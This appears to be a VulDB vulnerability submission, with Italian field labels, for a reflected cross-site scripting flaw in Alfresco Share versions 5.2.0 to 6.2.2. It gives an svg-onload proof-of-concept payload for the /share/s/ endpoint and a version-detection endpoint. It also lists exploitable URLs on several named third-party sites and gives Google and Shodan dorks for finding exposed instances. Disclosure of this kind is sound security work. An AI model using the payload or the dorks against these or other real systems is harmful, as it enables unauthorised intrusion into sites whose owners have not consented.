| Titolo | Alfresco Software Alfresco Community/Enterprise 5.2.0 to 6.2.2 Cross-Site Scripting |
|---|
| Descrizione | Reflected Cross-Site Scripting (XSS) in Alfresco Community/Enterprise
A Reflected Cross-Site Scripting (XSS) vulnerability was identified in Alfresco Community/Enterprise versions between 5.2.0 and 6.2.2. This flaw allows an attacker to execute arbitrary scripts within the victim's browser context, compromising the integrity and confidentiality of data.
Affected Components:
Alfresco Share (/share/s/ endpoint)
Vulnerable Versions:
Alfresco Community/Enterprise versions from 5.2.0 to 6.2.2.
Technical Note:
Versions above 6.2.2 are not affected by this vulnerability. However, a large number of Alfresco systems exposed on the internet today remain vulnerable.
Technical Details
The vulnerability can be exploited by injecting malicious code into unsanitized parameters in the /share/s/ endpoint. When the payload is accessed by a user, the JavaScript code executes in the victim's browser.
Exploitation Payload:
{{Host}}/share/s/%27%22><svg onload=alert(1)>
Real-World Example:
https://x.x.x.x/share/s/%27%22%3E%3Csvg%20onload=alert(1)%3E
Version Detection Endpoint
The Alfresco version can be identified by accessing the following endpoint:
{{Host}}/alfresco/service/api/server
Examples:
https://x.x.x.x/alfresco/service/api/server -> Version 6.2.2
http://x.x.x.x:8090/alfresco/service/api/server -> Version 5.2.0
Tested Versions and Exploitable URLs
Version 6.2.2
https://x.x.x.x/share/s/%27%22><svg onload=alert(1)>
Version 6.1.2
https://cloud.caf13.fr/share/s/%27%22><svg onload=alert(1)>
https://members.im2pact.org/share/s/%27%22><svg onload=alert(1)>
https://forge.citl.mun.ca/share/s/%27%22><svg onload=alert(1)>
Version 6.0.7
http://calas.lat/share/s/%27%22><svg onload=alert(1)>
Version 5.2.7
https://x.x.x.x/share/s/%27%22><svg onload=alert(1)>
Version 5.2.0
http://x.x.x.x:8090/share/s/%27%22><svg onload=alert(1)>
Mitigation
To mitigate this vulnerability:
Upgrade to a version above 6.2.2, as it is not affected by this issue.
Dorks
Google Dork:
intitle:"Alfresco » Login"
Shodan Dork:
https://www.shodan.io/search?query=http.favicon.hash%3A1333537166
|
|---|
| Fonte | ⚠️ https://docs.alfresco.com/support/latest/policies/security/ |
|---|
| Utente | erickfernandox (UID 57733) |
|---|
| Sottomissione | 03/01/2025 15:28 (1 Anno fa) |
|---|
| Moderazione | 17/01/2025 21:37 (14 days later) |
|---|
| Stato | Accettato |
|---|
| Voce VulDB | 292491 [Hyland Alfresco Community Edition fino a 6.2.2 URL /share/s/ cross site scripting] |
|---|
| Punti | 20 |
|---|